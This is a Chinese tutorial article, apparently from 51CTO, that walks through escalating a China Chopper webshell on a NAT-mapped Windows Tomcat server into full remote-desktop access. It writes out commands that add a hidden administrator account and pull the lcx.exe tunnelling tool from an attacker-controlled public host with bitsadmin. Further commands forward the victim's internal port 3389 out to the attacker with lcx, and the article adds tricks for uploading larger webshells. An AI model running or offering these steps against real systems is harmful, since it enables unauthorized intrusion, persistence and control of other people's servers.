[[200778]]

【51CTO.com原創(chuàng)稿件】在很多時(shí)候，我們可以獲取到一個(gè)菜刀馬，雖然能執(zhí)行命令，但是上傳文件卻有種種限制，尤其對(duì)于映射到外網(wǎng)的web網(wǎng)站，windows系統(tǒng)，即使有最高權(quán)限，但是我個(gè)人認(rèn)為遠(yuǎn)遠(yuǎn)沒有一個(gè)3389的遠(yuǎn)程桌面來得爽，本篇文章主要講述在有一個(gè)菜刀馬的前提下的，如何突破內(nèi)網(wǎng)映射到公網(wǎng)的主機(jī)，直接遠(yuǎn)程桌面連接內(nèi)網(wǎng)的3389!

0x01 前言

我們獲取到一個(gè)菜刀馬之后，在權(quán)限范圍內(nèi)可以查看任意目錄，執(zhí)行任意命令，但是我們常常也會(huì)遇到各種各樣坑，如有些文件我們上傳不了，有些文件我們也下載不下來(可能是文件太大，也可能是文件夾不方便下載)，有些文件不好壓縮等等，主要是針對(duì)windows的web服務(wù)器，但是如果我們能獲取到一個(gè)3389的遠(yuǎn)程桌面，那么這些問題基本可以得以解決!

對(duì)于本身就是獨(dú)立外網(wǎng)ip的windows主機(jī)，那么我們只需要查看主機(jī)有沒有開3389端口，如果沒有開的話我們使用命令進(jìn)行開啟，如果3389已經(jīng)開啟的情況下，那我們就可以直接添加一個(gè)管理員賬號(hào)，然后遠(yuǎn)程桌面連接即可!但是目前對(duì)于相對(duì)大一點(diǎn)的公司來說，比如運(yùn)營商，往往都是通過映射的方式提供外網(wǎng)的一個(gè)web服務(wù)，其實(shí)真正的web服務(wù)器則是內(nèi)網(wǎng)的一臺(tái)web服務(wù)器，并且該內(nèi)網(wǎng)服務(wù)器同時(shí)具備內(nèi)網(wǎng)和外網(wǎng)的功能，簡(jiǎn)單來說，就是同時(shí)連接了兩個(gè)網(wǎng)絡(luò)，一個(gè)與內(nèi)網(wǎng)互通，一個(gè)可以訪問外網(wǎng)，而外網(wǎng)卻無法直接訪問，可以簡(jiǎn)單理解為家庭路由器!對(duì)于這種情況，我們就可以使用端口轉(zhuǎn)發(fā)工具，將內(nèi)網(wǎng)的3389端口轉(zhuǎn)發(fā)到我們的公網(wǎng)獨(dú)立ip上面，從而通過連接我們的公網(wǎng)ip來間接連接內(nèi)網(wǎng)的3389!

在這里，簡(jiǎn)單說一下上面所說的內(nèi)網(wǎng)地址和公網(wǎng)地址，私有地址(Private address)屬于非注冊(cè)地址，專門為組織機(jī)構(gòu)內(nèi)部使用，俗稱內(nèi)網(wǎng)地址。以下列出留用的內(nèi)部私有地址：

A類 10.0.0.0--10.255.255.255

B類 172.16.0.0--172.31.255.255

C類 192.168.0.0--192.168.255.255

公網(wǎng)地址簡(jiǎn)單來說就是任何聯(lián)網(wǎng)設(shè)備都能訪問的地址!

0x02 實(shí)戰(zhàn)環(huán)境

本次實(shí)戰(zhàn)環(huán)境是windows server 2008 R2，server版本是apache tomcat/7.0.59!環(huán)境如圖1所示：

圖1 操作系統(tǒng)信息

0x03 查看基本信息

我們通過菜刀的虛擬終端查看目標(biāo)主機(jī)的ip地址，發(fā)現(xiàn)該IP不是我們公網(wǎng)訪問網(wǎng)站的IP地址，而是一個(gè)內(nèi)網(wǎng)地址，如圖2所示，這里我們認(rèn)為可能該web是通過映射到公網(wǎng)上進(jìn)行訪問的

圖2 查看ip地址

在運(yùn)營商，目前多數(shù)開放在公網(wǎng)的業(yè)務(wù)系統(tǒng)，基本都是通過映射的方式來將業(yè)務(wù)系統(tǒng)放在公網(wǎng)上面!

另外通過使用whoami查看當(dāng)前用戶，如圖3所示，發(fā)現(xiàn)我們的權(quán)限是system權(quán)限，顯然是可以執(zhí)行任意操作的!

圖3 whoami查看

0x04 確定入侵方式

雖然我們可以執(zhí)行任意操作，但是由于局限于菜刀本身工具的限制，導(dǎo)致我們很多功能受到了大大的限制!并且對(duì)于是windows操作系統(tǒng)，我們只有類似cmd的shell，顯然遠(yuǎn)遠(yuǎn)不能滿足我們的欲望，對(duì)于windows系統(tǒng)來說，我的最終目標(biāo)應(yīng)該是管理員權(quán)限來進(jìn)行遠(yuǎn)程桌面的連接(能不能實(shí)現(xiàn)是一回事)!

首先我們查看下當(dāng)前開放的端口信息，使用netstat –ano查看端口信息發(fā)現(xiàn)我們期待的遠(yuǎn)程桌面服務(wù)端口3389，如圖4所示：

圖4 查看端口信息

此時(shí)我們就大體確定了入侵的思路，想辦法連接他的3389端口，因?yàn)槭莝ystem權(quán)限，因此我們完全可以添加一個(gè)管理員賬號(hào)!

思路主要是以下四點(diǎn)：

1、添加一個(gè)管理員賬號(hào)

2、上傳端口轉(zhuǎn)發(fā)工具

3、進(jìn)行端口轉(zhuǎn)發(fā)

4、遠(yuǎn)程桌面連接

0x05 添加管理員賬號(hào)

windows下主要使用net user進(jìn)行添加賬號(hào)，主要命令如下：

net user 顯示系統(tǒng)用戶

net localgroup administrators 顯示管理員賬戶

net user 用戶名 密碼 /add 添加用戶

net localgroup administrators 用戶名 /add 添加用戶到管理員組

如圖5所示，我們成功添加了管理員賬號(hào)。

圖5 添加管理員賬號(hào)

添加了管理員賬號(hào)了，我們接下來就是上傳端口轉(zhuǎn)發(fā)工具!

0x06 上傳端口轉(zhuǎn)發(fā)工具

windows下面，我們常用的端口轉(zhuǎn)發(fā)工具就是lcx.exe，另外還有windows自動(dòng)的netsh，但是我在自己的環(huán)境下試過沒有成功，其他的端口轉(zhuǎn)發(fā)工具可自行百度，對(duì)于linux的系統(tǒng)，我個(gè)人覺得端口轉(zhuǎn)發(fā)沒什么必要(可能我技術(shù)太菜，因?yàn)閘inux可以直接反彈bash，或者自己nc反向連接等，如果有大神知道，煩請(qǐng)多多指導(dǎo)下linux端口轉(zhuǎn)發(fā)的場(chǎng)景)，因此我接下來就是直接上傳lcx.exe。

對(duì)于上傳文件，我個(gè)人主要知道以下方法進(jìn)行上傳，一是通過上傳點(diǎn)進(jìn)行上傳，對(duì)于這種方式的上傳可參考文章《淺談文件解析及上傳漏洞》 ;二是通過相關(guān)工具上傳，比如一些利用工具自帶的上傳功能，如K8的Structs2漏洞利用工具，菜刀的文件上傳功能;三是通過服務(wù)器自帶的遠(yuǎn)程文件下載工具，如linux的wget，windows的bitsadmin。

由于我們有菜刀馬在手，所以我們現(xiàn)在先使用菜刀自帶的上傳文件功能進(jìn)行l(wèi)cx工具的上傳，如圖6所示：

圖6 菜刀馬文件上傳功能

但是我們的運(yùn)氣很不好，lcx直接上傳失敗，如圖7所示：

圖7 lcx上傳失敗

此時(shí)我們可以通過上傳一個(gè)大馬，看看能不能通過大馬進(jìn)行上傳lcx，但是我們又失敗了，如圖8所示：

圖8 大馬上傳失敗

這里可以告訴你們一個(gè)方法可以上傳大馬，就是上傳一個(gè)jsp的普通馬，然后使用jsp一句話客戶端來上傳大馬就能成功上傳大馬，但是我們的運(yùn)氣實(shí)在是很不好，我們的大馬雖然上傳成功了，但是卻無法正常訪問，如圖9所示：

圖9 大馬訪問失敗

由于這只是一個(gè)登陸頁面，也沒有發(fā)現(xiàn)有文件上傳功能，所以我們可以使用第三種方法了，使用系統(tǒng)自動(dòng)的遠(yuǎn)程文件下載工具，通過上面我們使用version查看到操作系統(tǒng)是windows的，所以我們選擇使用bitsadmin，通過bitsadmin來下載我們放在公網(wǎng)主機(jī)上面的lcx，對(duì)于bitsadmin，主要使用語法如下：

bitsadmin /transfer n http://獨(dú)立外網(wǎng)ip/lcx.exe c:\lcx.exe

n是jobname，可以隨便命名，后面的一個(gè)是遠(yuǎn)程文件的路徑，最后一個(gè)參數(shù)是下載到服務(wù)器的路徑及文件名!當(dāng)我們使用該命令下載lcx到服務(wù)器上面時(shí)，居然提示failed，如圖10所示：

圖10 bitsadmin下載lcx到服務(wù)器失敗

如果你信他真的失敗了，那么就就太天真了，這里可能有一個(gè)原因是菜刀馬連接超時(shí)了，所以我們依然使用dir來查看下，此時(shí)你會(huì)很興奮，如圖11所示：

圖11 lcx文件上傳成功

如果真的下載失敗了，可以更名后在進(jìn)行下載試試!

0x07 端口轉(zhuǎn)發(fā)

既然端口轉(zhuǎn)發(fā)工具上傳成功了，我們可以通過命令執(zhí)行l(wèi)cx來看看lcx的使用幫助，如圖12所示：

圖12 lcx使用幫助

簡(jiǎn)單點(diǎn)來說，主要使用方法如下：

本地 lcx -listen 51 3388

肉雞 lcx -slave 本機(jī)ip 51 肉雞ip 3389

本機(jī)ip指的是外網(wǎng)獨(dú)立ip的windows主機(jī)的ip!

則連接為：127.0.0.1:33891 ，另外可通過本地(局域網(wǎng))連接本機(jī)ip(外網(wǎng)獨(dú)立ip)的33891端口進(jìn)行連接!

51 改則兩個(gè)改，3388可改!

簡(jiǎn)單點(diǎn)來說，就是本機(jī)將肉雞轉(zhuǎn)發(fā)過來的端口進(jìn)行監(jiān)聽，并轉(zhuǎn)發(fā)到本機(jī)的另一個(gè)端口上面，通過連接另一個(gè)端口來間接連接肉雞的33898!

本次我們打算將肉雞的3389轉(zhuǎn)發(fā)到我們本機(jī)的51端口上面，在將51端口轉(zhuǎn)發(fā)到本機(jī)的3388端口，我們先在本機(jī)進(jìn)行監(jiān)聽，如圖13所示，成功監(jiān)聽。

圖13 外網(wǎng)ip上面進(jìn)行監(jiān)聽

此時(shí)我們執(zhí)行第二條命令來連接到外網(wǎng)IP的51端口上面，但是我們發(fā)現(xiàn)虛擬終端提示failed，如圖14所示：

圖14 lcx轉(zhuǎn)發(fā)failed

根據(jù)上一個(gè)我們懷疑可能不是failed，我們通過查看我們外網(wǎng)IP的監(jiān)聽情況，發(fā)現(xiàn)內(nèi)網(wǎng)主機(jī)已成功將3389轉(zhuǎn)發(fā)到了51端口上面，如圖15所示：

圖15 內(nèi)網(wǎng)已成功轉(zhuǎn)發(fā)

通過以上相關(guān)操作，我們端口轉(zhuǎn)發(fā)已成功，最后就是在本地(局域網(wǎng))來連接我們外網(wǎng)IP的3388端口來間接遠(yuǎn)程桌面連接內(nèi)網(wǎng)的3389端口!

0x08 遠(yuǎn)程桌面連接

最后我們只需要遠(yuǎn)程桌面連接外網(wǎng)IP的3388端口即可，如圖16所示，我們成功通過遠(yuǎn)程桌面連接了內(nèi)網(wǎng)的主機(jī)。

圖16 成功連接到內(nèi)網(wǎng)的3389端口

0x09 簡(jiǎn)單總結(jié)

本篇文件主要是介紹一個(gè)簡(jiǎn)單的通過公網(wǎng)滲透來連接映射出來的內(nèi)網(wǎng)主機(jī)的遠(yuǎn)程桌面端口;其次也是簡(jiǎn)單介紹了文件上傳的三種方式，其中，對(duì)于linux大家都熟悉使用wget，但是對(duì)于windows的，可能還是有部分人不知道bitsadmin這個(gè)命令可以遠(yuǎn)程下載網(wǎng)絡(luò)文件(可能我是菜鳥，所以知道得晚);還有就是對(duì)于jsp的網(wǎng)站，如果我們大馬上傳不成功，那么我們可以先上傳一個(gè)普通馬(我遇到的基本都能成功上傳，前提是能上傳jsp文件哈)，然后使用jsp一句話客戶端來進(jìn)行大馬上傳，這樣一般都能上傳成功，但是能不能正常訪問就看個(gè)人的人品了;最后就是由于菜刀這個(gè)工具也是人開發(fā)出來的，所以可能還是存在一定的缺陷(也可能是我自身的使用問題)，就是對(duì)于連接時(shí)間或者數(shù)據(jù)傳輸?shù)囊恍┬栴}，如果顯示內(nèi)容過多，那么就會(huì)直接顯示failed，或者有些命令有延遲，也會(huì)顯示failed，但是本機(jī)卻還在執(zhí)行命令中，所有有時(shí)菜刀虛擬終端提示的failed，最好是驗(yàn)證下，不要看到failed，就認(rèn)為是失敗了!

【51CTO原創(chuàng)稿件，合作站點(diǎn)轉(zhuǎn)載請(qǐng)注明原文作者和出處為51CTO.com】